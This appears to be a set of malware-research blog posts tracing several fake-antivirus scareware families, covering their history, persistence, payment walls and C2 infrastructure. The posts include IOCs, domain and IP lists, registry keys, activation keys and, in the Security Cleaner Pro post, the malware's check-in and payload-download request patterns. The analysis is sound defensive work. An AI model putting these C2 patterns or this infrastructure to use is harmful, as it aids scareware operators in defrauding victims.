Inside Braviax/FakeRean: An analysis and history of a FakeAV family
Since September 2014 I've been seeing a FakeAV family pop up from time to time. This family is known under two names, Braviax and FakeRean. The family has been active for quite some years, it was first spotted by S!Ri back in April 2009. In this blogpost I will perform an analysis on the current version of this family making it's rounds online and a history of it starting back in 2009. A big thank you goes out to S!Ri for sharing some historical data on this group.
The reason why I'm releasing this article now on a group active back in January of this year is that, if you follow the timeline I show below, is that they should have reappeared around this time of year (although I haven't seen them yet).
The Braviax/Fakerean family has quite some similarities with the Tritrax (dubbed Namechanger FakeAV) family I analyzed and hunted down back in February 2014 (Post: Analysis of the Tritax FakeAV family, their active campaign and the FakeAV social engineering kit). Braviax/Fakerean is also one constantly changing its name as you can see from a combination of screenshots made from samples starting in September 2014 until the start of January 2015:
As said, back in September 2014 this new variant became active. After seeing it pass by multiple times I decided to look into it a bit. At some point I started noticing the name changes due to the fact that the website, website banner and the actual 'antivirus' names didn't match up at all, I tweeted about this on the 27th of September:
#FakeAV website calls it 'Rango Antivirus', banner 'Win XP Security', sample run 'A-Secure' (https://t.co/EgYDdzDqFd) pic.twitter.com/i1amKQLsIy
— Yonathan Klijnsma (@ydklijnsma)
November 27, 2014
From this point on I started looking into this FakeAV threat some more, it started to hit quite often. Quite quickly I could pin this as one as part of the Fakerean/Braviax family and started to analyze it.
Analysis: Spreading mechanism
We'll start the analysis of this family with the method of how it was spread, simply by mail. Around the 18th of December 2014 fake FedEx emails began to appear, one of these carying methods of infecting victims with this FakeAV. The email looked like this:
In the emails' attachment we find a JS file:
Inside of this script we find a large piece of obfuscated script:
If we clean it up we can see its just a simple downloader which tries to infect the user with 3 pieces of malware (shotgun approach much..):
From the three payloads only one is the interesting one for this article; its the Braviax/FakeRean sample. Would you want to perform a more detailed analysis (rather than the very short one below), the sample coming from this email and used further is: 1d01611a1f88c7015c54efedacfcbc8fec55ad6de9a438087abff3be78c19901
Quick analysis: a Braviax/FakeRean sample
Because this article is more about the history of this family rather than the specifics of the FakeAV this part will be a very(!) short analysis of the sample.
When ran the FakeAV shows the usual pop-up with information on your system being infected:
Additionally when you close the window (or try to close the FakeAV program in any way) a fake Windows security center window will pop-up:
In the process of scaring the user the FakeAV copies itself to a new location and installs a registry startup key, the normal persistence method seen. The FakeAV also monitors processes that are running and kills the ones it doesn't like which includes system utilities like taskmgr but also tools like wireshark and alike. All of this to convince the user into buying the 'product' to clean up the 'infection' that stops them from starting these processes.
The FakeAV also performs some C2 communication which includes information on the payment C2 service:
The client performs a request to the C2 server located at gelun-posak[.]com, the path is an encoded and base64'd unique system ID. The response contains a small config, the partially readable text string 'eo-moquales[.]Nom' is in fact the payment wall which (after decoding) is golen-mortales[.]com.
Overal this FakeAV is just alike any other I've written on in the past. Payment service runs on a seperate C2 server while the main C2 server is just for infection registration / statistics. Enough on the malware, lets move on to have a look at this family's history.
The Family
The Braviax/Fakerean FakeAV family has been around for quite some time, @S!Ri first spotted them 6 years ago. Back in around April 2009 samples started to appear for a FakeAV naming itself “Home Antivirus 2009″ and was the first of more to come:
Around the start of July it was followed by a 2nd version called “PC Security 2009″:
A 3rd version appeared at the end of July already, this time called “Home Antivirus 2010″ (even though still being 2009... they were ahead of time it seems):
Near the end of August the 4th installment of the family appeared, this time it was called “PC Antispyware 2010”. This one actually loaded an AV database, stolen from ClamAV (in fact an old one from 2007):
Then in September the 5th version appeared, “Antivirus Pro 2010”:
In 2009 5 versions of the Braviax/Fakerean family hit, from September until the end of January 2010 it was quiet; nothing new appeared. At the end of January a completely changed version appeared, this one changed it appearances depending on whether it ran on Windows XP, Vista or 7. Even under these platforms it had multiple names. Under Windows XP it called itself one of the following names:
Antivirus XP 2010
XP Guardian
XP Internet Security
Under Windows Vista it called itself one of the following names:
Vista Antivirus Pro 2010
Vista Internet Security 2010
Finally, under Windows 7 it called itself one of the following names:
Win 7 Antispyware 2010
Win 7 Internet Security 2010
An interesting move to have some name mangling dependent on the platform. After they pushed these it stayed quiet until November. In November they released a new version with similar names, only the year was bumped from 2010 to 2011. The Windows XP variants for example:
XP Security 2011
XP Antispyware 2011
In february 2011 a new version appeared with slightly updated names and GUI layout:
XP Anti-Virus 2011
XP Home Security 2011
XP Anti-Spyware
In the end of June 2011 another updated version was released. Again some updated OS based name mangling changes and updated GUI:
XP Internet Security 2012
Win7 Internet Security 2012
Another slightly updated version appeared in the end of November 2011, still based on the OS based name mangling:
January 2012 a new updated version, GUI mostly, got pushed:
In the start of October 2012 another slightly updated version appeared. Mostly GUI changes and again still based on the OS version name mangling:
Then almost a year later at the start of September 2014 the version from my analysis appeared. An entirely updated GUI and new names showed a big change. It appeared under the following names (with OS version names displayed, although not all use it):
Sirius (Win 7|Win 8|Vista) Protection 2014
Zorton (Win 7|Win 8|Vista) Protection 2014
Rango (Win 7|Win 8|Vista) Protection 2014
A-Secure 2015
AVbytes (Win 7|Win 8|Vista) Antivirus 2015
AVC Plus
GUI wise it looks like this (name stripped as its templated in the GUI at runtime):
However in the end of September 2011 a sort of offspring appeared as well named Advanced PC Shield 2012, another one appeared in August 2012 called Win 8 Security System:
Eventhough this version is also ranked in the Braviax/Fakerean family it looks somewhat different in setup.
Conclusion
The Braviax/Fakerean family has been around for a long time appearing as early as April 2009 and seems to be a success as new reincarnations appear every year.
While they aren't as big as a threat as banking malware or ransomware it does pay well for these criminals. Because of their 'low' volume and simply being scareware not a lot of attention is given to them. I'll be keeping an eye on them for future campaigns for sure though :)
IOC's & Samples
The following is a list of samples for the last version spreading from September 2014 to December 2014. No new ones have appeared as of writing this blog article.
Analysis of the Tritax FakeAV family, their active campaign and the FakeAV social engineering kit
This time I'm diving into an active FakeAV campaign, I've named it the NameChanger FakeAV, it falls under the Tritax family. Now why I named it the namechanger, just take a look the following image composed of screenshots of all the different samples:
Update (27-2-2014): Updated the end of the article with a list of domains and IP's seen in the past 2 months. Tritax is still active and distributing.
Update (20-3-2014): After sinkholing and taking down the domains actively with the help of some friends it seems the Tritax actors gave up. The TDS's stopped redirecting and no new domains are being registered, taking action against this campaign was successful!
Some time ago a friend, @VriesHd, pointed out a FakeAV spreading via businessinsider.com: http://urlquery.net/report.php?id=8495695 Not long after this, a similar thing happened to DailyMotion.com. A writeup for that was done by invincea: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/ Skype advertisement has also been affected by the campaign: http://community.skype.com/t5/Security-Privacy-Trust-and/Skype-ads-in-rotation-have-been-compromised-and-contain-Malware/td-p/2894251
More recently the same campaign was seen by @Malekal redirecting via PopAds delivered advertisement: https://twitter.com/malekal_morte/status/426394544414793728 and another finding: https://twitter.com/malekal_morte/status/430050149650292736
David Jacoby from Securelist also published an article after Tritax started spreading via one of the largest websites in Sweden: http://www.securelist.com/en/blog/208216070/Largest_Website_in_Sweden_Spreading_Malicious_Code
The Tritax family has been around for a long time, the first sample of it was seen around may 2009. The current campaign drops a sample I have named NameChanger.C as its the third FakeAV type from this family that is constantly being repackaged with new names.
I'll start of with an analysis of the current version of the FakeAV, after this I'll go into the family, third will be the new FakeAV social engineering kit this group is using with their current campaign. I'll end with a section which is a hashdump of all the samples I've been scraping from their backend.
Analysis
This sample drops from a specialized social engineering kit for FakeAV's, I'll get into details about this later. The name for this version is "Windows Accelerator Pro", MD5: 0a0fd6b228e1edb56067c86304c15861 (VT: 20/48).
It initially installs itself in the usual startup location, the keyname for these samples are "GuardSoftware":
"GuardSoftware"="C:\\Documents and Settings\\admin\\Application Data\\guard-hqxl.exe"
The filename is formatted as "guard-%s.exe", as can be seen when running the sample through OllyDBG in the image below. Since the 1st or 2nd of February samples are now formatted as "svc-%s.exe".
After the sample has installed itself it will force a reboot in order to make sure no other analysis tools are started. When its first ran (before the reboot) it will show a splashscreen:
Once the machine has rebooted it will show the usual fake scanning with detection of infected items:
Once completed the user gets a listing of all the affected files:
When you attempt to clear up the infections by hitting "Remove All" we get a message regarding activation. You cannot clean up until you active the product:
Before we activate the 'product' lets have a look around at what it 'can' do for us:
All of course are unavailable to us unless we activate. When enabling one of the options we get the same "Activate" popup.
There's also an about section in the 'product':
Besides the fake scanning and available options it will also show a variety of fake warning messages:
Some more aggressive warnings appear from time to time as well:
We are also, like usual with FakeAV's, not allowed to start any applications because they are 'infected':
It also warns us that we are torrenting and that downloading pirated material is a felony:
When we click the "Get anonymous connection" button we go back to the activation form again. When we hit the "Activate" button we are greeted by a payment form:
The form is retrieved by starting the Microsoft HTA client:
This is the C&C for this FakeAV, all subsequent traffic from this sample will go towards this IP.
Now if we go to the "Register" section we can 'activate' the product:
We do need a valid key for this one. The key for this sample is:
1W111-111B1-11T11-E1121
Note: If you have any old infections from before July 2012 the key is "0W000-000B0-00T00-E0020"
When we enter the correct key we are allowed to activate:
As soon as we hit the "Register" button we are taken back to the scan results page and it will start 'cleaning' up the infections:
Now if we look at the application it has all turned green and all 'functionality' is available to us:
The about form is also updated with the activation date and serial:
The application stores the activation data in the registry like this:
The "Config" key holds the activation key as well:
This FakeAV has inbuilt translations for German, French and Spanish:
I've seen the following IP's for the C&C's in samples dating from November 2013 until February 2013:
93.115.82.249
93.115.82.248
93.115.86.197
Interesting fact; These guys have been using a valid license for ASProtect for many of their payloads. This makes analyzing and reversing a bit harder, especially unpacking the samples.
The Family
The FakeAV family that was spreading here is called 'Tritax'. It has been around for a very long time and @S!Ri has been writing about variants of this family for a long time. A big thank you to him for sharing some of the older samples of this family with me to get the timeline correct. You can follow his FakeAV findings here: http://siri-urz.blogspot.fr/
The first sample appeared around may 2009, it was called "Crusader Antivirus":
This one displayed the usual fake warnings and fake scanning like we see now:
This FakeAV was meant to look like the AGAVA Antispy application which was a legit application. Crusader mimicked most of the GUI of Antispy:
This first sample is in fact where the "Tritax" name comes from, on the about dialog a company was described as "TRITAX Limited":
The samples for this one, MD5: 301b4ca82a0dc6931562e9b322ceb7c1
The 2nd installment of the family was called "SecretService", this one has had 2 versions:
After the SecretService version, "Privacy Center" and "Safety Center" popped up:
After those we were greeted by "Privacy Center" and "Control Center":
Now we are greeted with the first NameChanger variant, I've named it NameChanger.A. It first appeared in December 2010. It has been seen with the following names:
The GUI has had a few changes but the general look stayed the same. A few samples:
After variant A, the B variant: NameChanger.B appeared in May 2011. It has had the following names:
And looked the same in every sample, only the name constantly changed:
And in February 2012 the first version of our NameChanger.C appread, it was named 'Windows Protection Manager'.
This shows how long this group has been active, 2009 until now. Their current campaign is still really active and spreading new versions of NameChanger.C. It seems they have now got a good setup going with the special FakeAV Kit.
The full list of used names so far for NameChanger.C:
The Social Engineering Kit
I encountered the first sample when being redirected from the Businessinsider website. While initially it seemed like a one-off I found out this is an actual package like you would normally see with exploit kits. In this case it relies on social engineering.
When landing on this kit a user is greeted with a javascript alert message:
Then a page which shows a fake message from Microsoft Security Essentials. The message lists a number of items that are supposedly infected:
When clicking the "Clean computer" message the user is prompted with a download with names like "Setup.exe" or "Install.exe". This is when the user downloads the FakeAV and manually runs it. This way it looks believable that an Antivirus suddenly comes up talking about infections on your computer.
I have found different FakeAV family campaigns using this Kit, the only one I have seen being updated on the landing page is the one for the Tritax group. Initially the landing page looked like this:
Around the 10th of January it suddenly changed the JavaScript on the landing page to a crypted version.
A week later on the 17th of January the landing changed again, only this time the crypted JavaScript snippets were put in external files called "scr1.js" and "scr2.js". Landing page code:
During this time the DNS for the landing of the Tritax group is always on a subdomein, this is either 'b2811a66', 'c3913c6c', 'e324rfds', 'wed322d2', '5c4e4143' or '90d6bc5a'. Of course this will change from time to time, it just means the main domain never points to the landing server, its always a subdomain. Additionally the domains used by this group are registered at registrars allowing for domain tasting (5-day testing period, free!). The domains rotate every so few days. The first registar I saw them appear was Domeny.pl, they are current being tasted at Key-Systems GmbH. These are the stats in terms of TLD's I have seen:
106 pw
76 nl
30 pl
15 com
Here is a full list of all the domains used in the period of 1st of January 2014 until the 25th of January 2014.
These domains used custom nameservers, @vriesHD has done his best taking these down for the past months. The IP's I've seen used in this campaigns landing pages are:
93.115.82.246
93.115.82.247
93.115.86.199
212.83.137.239
212.83.138.29
212.83.138.30
212.83.155.45
The following domains have been seen for the custom nameservers:
dsfe1.com
dsfe2.com
svav1.com
svav2.com
stav1.com
stav2.com
isavx.com
isavh.com
ispav.com
ispax.com
Additionally to advertisment and spam mail spreading these guys have also compromised a large number of websites. All websites compromised are Wordpress websites. A malicious PHP file was uploaded after exploitation. This file gives redirects to domains listed above (and the new ones still being generated). These pages respond with:
Analysis of the "Internet Security" fake antivirus leads to family of FakeAV and possible actor behind it
Stumbled upon another one of the FakeAV's, its called"Internet Security" this time and the detection is decent for once.
Initial payload from exploit kit b4662d40b12250f79ffec121a083ba6e (VT 19/48)
Unpacked payload f77c7098ce70e9e197a37f1264357bf1 (VT 21/48)
Unpacked the 2nd layer dd158a5d2caa7f9df1bba52e51db7c2c (VT 21/48)
Analysis
The sample dropped from Neutrino and after being dropped it started to install itself and show fake security related warnings. It installs itself in %appdata% as avsecurity.exe and a startup key in the usual '\Software\Microsoft\Windows\CurrentVersion\Run' section of the registry.
After it installed itself and made sure it killed all other running processes except windows explorer and other default windows processes. After this it starts displaying its fake warnings:
Also show popup messages from time to time indicating more problems on the computer:
And again like we've seen with previous FakeAV every single process we try to spawn is killed and market as 'infected':
After the initial scan finishes it tells us many problems have been found and we need to register before we can clean them up:
We will close that window for now and look around what else this 'antivirus' can do:
Now if we want to modify any of the options we get the message we need to activate:
Now lets get back the registration, we can either fill in our email and registration key we payed for or if we don't have those we can pay to get them. The payment dialogs looks like this:
Now of course we aren't going to pay. Back to the activation form:
Putting in junk info will not get it activated sadly:
Now if we attach our favorite debugger we can find out that the key is (as usual) static and any combination of an email address (can be junk info) with that key will work. The key for this "Internet Security" is the same in all samples I've been able to find, the key is:
Y68REW-T76FD1-U3VCF5A
We register successfully now:
We can also finally remove those infections!
And the application itself also shows that it is activated and we now have a 'high security' level:
After rebooting it still knows that we activated it because it writes a lockfile called 'avbase.dat' to disk:
The payment pages we saw earlier are webpages being loaded using the IE object in a form, the urls (same order as the screenshots):
On the main tab we see a button saying "License Information..." if we click this it opens a browser loading 'http:// www.3dsecureinternational .com/info.php' which will redirect to 'https:// secure.bill3dpayusauto .com/'. If we provide the correct information (email + CC) we can see our subscription status:
All the payment pages including this customer service page provide ssl from StartSSL which is free the first year, the certificate for the customer service:
Additionally to dropping via exploit kits you can also just purchase it from their website located at 'http:// securityserviceauto .com'. This allows purchase and see all its 'amazing' features:
All domains seen with this FakeAV:
regdexsecurity.com
combilling.com
securityserviceauto.com
3dsecureinternational.com
bill3dpayusauto.com
defendersecurityauto.com
autointsecurity.com
bill3dpayus.com
licencecheck24.com
internet-security2013.com
3dsecpay.com
All IP's seen with this FakeAV:
194.54.80.212
194.54.81.20
194.54.81.101
Statistics
I have been monitoring the backend of this FakeAV and was able to build some statistics. In 12~ hours I saw around 1400~ unique IP's contacting the C&C. I saw around 30~ successful payments, 400~ clients opened the payment window but never ended up paying and I saw about 70~ clients just visiting the main website.
From the total amount of clients that have payed their geographical location (in percentages over a time span of a couple of days):
United States: 72%
France: 13%
United Kingdom: 7.5%
Puerto Rico: 4.5%
Australia: 1%
Argentina: 1%
Jamaica: 0.5%
Canda: 0.5%
The family
While reverseing this FakeAV I found an interesting string embedded in the sample:
This option is available only in the activated version of WinPC Defender. You must activate the program by entering registration information to use all of its features.
So lets see what this WinPC Defender is about, the hash for the sample of WinPC Defender is 'af736cb7ea46b63f6a1cd9526eaf67a7' (VT: 45/48). Lets infect ourselves with this sample, main window already looks familiar:
So it seems our actors have been busy, our first sample seems to be an improved and reskinned version. So lets register this version, after looking at it with the debugger the key was found to be:
C79AA343F95B062F000C309C14DE2954
Again any combination of an email address (or junk info) and this key will work to activate this FakeAV:
After restarting the sample still recognized the activation, this is because it writes a registry key to store its activation data:
[HKEY_CURRENT_USER\Software\WinPC Defender]
"email"="[email protected]"
"key"="C79AA343F95B062F000C309C14DE2954"
And the main form also changes similar to what we saw with our first sample from "Internet Security":
The domains seen with this FakeAV:
2payon.com (payment processor)
winpcdefender09.com (main C&C)
The IP's seen with these domains:
78.46.88.142
194.165.4.77
After some more research I found another sample which seems to be the version before "WinPC Defender". This one was called 'XP Police Antivirus'. The hash for this sample is "c9e1a1f20501280c5e2caf0fa7c1425a". (VT: 34/48)
Again the main form looks similar, more simplistic and from what I could tell this is the first version of this family:
If we look at the registration we also see a lot of similarities:
Now if we reverse the registration/activation we find something interesting; the key from 'WinPC Defender' is the same one being used by 'XP Police Antivirus'. The Key is (again):
C79AA343F95B062F000C309C14DE2954
And after we register it writes similar information to the registry for its start-up check of previous activation:
[HKEY_CURRENT_USER\Software\XP Police Antivirus]
"email"="[email protected]"
"key"="C79AA343F95B062F000C309C14DE2954"
The activation step:
And again the main form looks a lot like the previous samples we looked at after activation:
The domains involved with this FakeAV:
xp-police.com
The IP's seen with these domains:
213.155.10.63
213.163.65.10
Another thing to note is that all of the samples were written in Delphi. We can pretty much bind these 3 samples together as a family, you can also see the evolution of the icon if you put all the shortcuts next to each other:
Conclusion
We can conclude these 3 belong to the same family / authors. They were first seen with the "XP Police Antivirus" which appeared around January 2009, this was followed with the "WinPC Defender" variant which first appeared around June 2009. The current version "Internet Security" was first seen around October 2013, this leaves a large gap from 2009 to 2013 in which I am unable to link more to this family.
Edit: The gap can be filled with the data S!Ri collected, take a look at his blog here: http://siri-urz.blogspot.fr/search/label/Sig.
I also looked at the registration info on all of the domains but it seems fake identities have been used. I did bind a couple of used email addresses to facebook accounts and names but these ended up being used interleaved so I cannot be sure. Most of them seem to be stolen/abused identities.
The only thing I did notice was that all registrations at first had the name 'Sergey Ryabov' in it with the email address '[email protected]'. The information changed to some kind of privacy service a bit later every time. I was unable to bind this name and/or email address to an identity I could confirm.
Analysis of the "Security Cleaner Pro" fake antivirus
Another one of the FakeAV's, this time it is called "Security Cleaner Pro". The detection is quite low, 4/48 on VT for the loader and 8/48 for the payload.
This sample dropped from Blackhole and installed itself as usual with a shortcut on the desktop and active in the system tray.
When the loader starts it will try setting up a connection with the C&C to report a new install for the loader. After this it requests a payload. This payload will also check-in to tell it has properly installed. After that the FakeAV payload will do check-ins at a regular interval to confirm payment to the C&C. On a network level this looks like this step by step:
GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=1
200 OK (text/html)
GET http://<domain> .tld/index/getsoft/?id=<unique_system_id>&os=<os_info>&advertid=<affiliate_id>&type=1
200 OK (application/octet-stream)
GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=2
200 OK (text/html)
GET http://<domain>.tld/index/checklic/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]
200 OK (text/html)
As you can see the install checking with type 1 is the loader and type 2 is the actual FakeAV payload. We get an non-crypted payload back.
After the payload has been downloaded it is copied to:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\shl.exe
The filename is fixed and always seem to be the same. One thing to note is that other versions I had installed in %appdata% and set a startup key instead of dropping in the startup folder, like so:
The filename shl.exe seems to be fixed since earlier versions as well.
After having setup itself the application starts with the usual infected scan information:
So yes the usual, we are infected! Now before digging into the activation lets look around at the applications. It features (fake) updating:
The rest of the application shows generic options which are all (obviously) fake and have no function.
You can also contact the support desk via email if you click the button at the top:
From time to time there is also a fake Windows Security Center popup to warn you to activate the AV, the entire dialog is an image and clicking anywhere just brings the FakeAV to the front:
Another trick this FakeAV does is hijack the browser, only Internet Explorer. When a new process is spawned it will check the filename, if its named 'iexplorer.exe' it will let it run, otherwise it will be killed. Funny enough it doesn't seem to be able to pick up new processes fast enough so if you just start your debugger 5-10 times fast one of them will not be killed.
The injection in IE looks like this when trying to browse anywhere:
Lets look at the activation of this 'product'. When you click register you will get a page looking really familiar, it seems to be a generic payment template also used by the Titan AV I wrote about some time ago.
We can pay or put in a registration key ourselves
If we cancel we get a warning message of how we are unprotected.
And if we enter the wrong information we get a warning.
So we open up our debugger and we figure out how the check works:
A simple string compare with the real key, so to activate this FakeAV we can use the following key which is hard-coded in all the bins I've tried. The key:
YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ
Now we are licensed and we can 'clean' the infections found during the scan. We are now also allowed to start new applications.
And as we can expect after registration any new scan turns up no infections.
Command and Control Server(s)
So with this FakeAV there are 4 dedicated C&C servers which form the backend. The initial domain seen with the first version I got was wirejournal.biz, after a day or so I got a new hit on lenderspoker.in. All the domains have multiple A-records pointing to:
188.93.210.164 - Russian Federation Moscow Ltd Hosting Service
109.234.154.254 - Russian Federation Saint Petersburg Ooo Network Of Data-centers Selectel
109.120.150.95 - Russian Federation Saint Petersburg Zao National Telecommunications
91.240.22.98 - Ukraine Donets'k Wibo Project Llc
After some more checking I was able to find more domains used by these IP's. Not sure what all these are for but its a somewhat big list for just a FakeAV:
blogscifi.info
corporationsbenefits.info
hichspeedtest.com
high-speed-dns.com
journalvillepremium.info
lenderspoker.in
lite-interserve-promo.com
mapaddiction.biz
ntbook.ru
podcastbots.info
psychologistdrive.info
requiresearch.info
testingadvisor.info
wirejournal.biz
woolis.ru
At the beginning you saw the structure of the check-ins. One of the params given with the check-in is 'advertid'. This refers to an affiliate of the program. The idea is that you sign up, get your own affiliate ID, you spread the loader given to you which checks in with your personal ID and for every new client you infect with it you get money. As simple as that.
One thing the C&C servers do when retrieving the loaders or payloads it modifies a resource of the PE called 'RCDATA' to hold your personal ID. This way an infection can be lead back to the appropriate affiliate for payment. This does mean every affiliate has unique bins. I've been able to identify at least 49 affiliates and have retrieved 89 unique loaders and 42 payloads. To get the AV vendors to create generic detection instead of specifics for a bin hash I've decided to upload all of them. At the end of the article you will find a section called 'Unique Samples' with their VT link. If you want any of these samples to analyze/play with send me a message on twitter or email me.
Additional info
Additionally when running the FakeAV through my debugger I found the following string in memory "http://softsupport.info/open.php". This domain is registered to a guy with the email address "[email protected]". If we look this up we get a list of domains all pointing to either 95.141.28.79 or 95.141.28.81. The list of domains I was able to get looks sketchy already:
cleanerpro1.biz
cleanerpro2.biz
cleanerpro3.biz
cleanerpro4.biz
cleanerpro5.biz
cleaner-pro1.biz
cleaner-pro2.biz
cleaner-pro3.biz
cleaner-pro4.biz
cleaner-pro5.biz
cleaner-pro6.biz
cleaner-pro7.biz
cleaner-pro8.biz
cleaner-pro9.biz
cleaner-pro10.biz
cleaner17.biz
I do not know what this guy is up to but if you also check the VT entries for those IP's: [95.141.28.79] and [95.141.28.81] you can see tons of DynDNS passing by. If I find out what his connection is to this FakeAV or what he is doing with those servers and domains I'll write another article.
